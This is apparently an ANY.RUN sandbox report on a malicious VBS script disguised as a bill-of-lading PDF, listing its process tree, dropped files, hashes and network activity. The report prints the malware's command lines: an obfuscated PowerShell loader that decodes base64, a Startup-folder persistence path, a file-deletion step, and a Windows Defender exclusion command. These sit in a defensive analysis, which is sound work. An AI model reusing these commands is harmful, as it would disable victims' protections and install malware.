;;$zvrjd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $lwzmk ) ); $zvrjd = $zvrjd[-1..-$zvrjd.Length] -join '';$zvrjd = $zvrjd.replace('%XRqhI%','C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\208430284251.billofolading.Inv.e-Awb.pl.04292025.20240814.174354.20240814.174426.0429202_pdf.vbs');powershell $zvrjdC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
1852cmd.exe /c del "C:\Users\admin\AppData\Local\Temp\208430284251.billofolading.Inv.e-Awb.pl.04292025.20240814.174354.20240814.174426.0429202_pdf.vbs"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1912powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
53 650
Read events
53 650
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
24
Unknown types
0

Dropped files

PID
Process
Filename
Type
1052powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4xnlfmez.j1d.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1052powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ewfrs4fw.zr4.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6048powershell.exeC:\Users\admin\AppData\Local\Temp\dll02.txtbinary
MD5:977E7717B1DEBC07678AADFF20F082B1
SHA256:FDB50A1EB4C76E6CAF3D9C6BE842C15CA1F4589235203C88D31704F52F1415CD
6048powershell.exeC:\Users\admin\AppData\Local\Temp\dll03.ps1binary
MD5:6BA2DDC0C9358898604FEFE11BD65CF4
SHA256:8F1D7DD06B8FDAB2834BCD2F916B0C772A0E84250D0F7B00E9A49BCB028BF620
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:85BA158760753DBF898A8057DB86C240
SHA256:F2A311FC786AC945D44A156CAD52D75EDB16E742D8061130F0CA715C5F740EE8
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1nm02qm.w0g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1312powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vgs022we.3vn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5972powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ougvzknb.de3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oaudxail.ec5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2908powershell.exeC:\Users\admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\server.txttext
MD5:B1A133CD07E355AC4C07F6EA82FA5446
SHA256:F90E96C2172EFD95C088EC042F2C8ED6557A0CB0D0AB85F90D0B63CB75467BF2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
33
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2092
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2092
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.216.77.37:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.59.18.102:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5496
MoUsoCoreWorker.exe
23.59.18.102:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6048
powershell.exe
104.21.32.1:443
www.pastery.net
CLOUDFLARENET
unknown
6544
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 23.216.77.37
  • 23.216.77.31
  • 23.216.77.35
  • 23.216.77.27
  • 23.216.77.28
  • 23.216.77.20
  • 23.216.77.25
  • 23.216.77.17
  • 23.216.77.18
whitelisted
www.microsoft.com
  • 23.59.18.102
  • 2.16.253.202
whitelisted
google.com
  • 142.250.184.206
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
www.pastery.net
  • 104.21.32.1
  • 104.21.64.1
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.80.1
  • 104.21.16.1
  • 104.21.96.1
unknown
login.live.com
  • 40.126.31.67
  • 40.126.31.73
  • 40.126.31.1
  • 40.126.31.129
  • 40.126.31.128
  • 20.190.159.130
  • 20.190.159.128
  • 20.190.159.23
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
localbusineess.com.br
  • 191.252.83.189
unknown
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
208430284251.billofolading.Inv.e-Awb.pl.04292025.20240814.174354.20240814.174426.0429202_pdf.vbs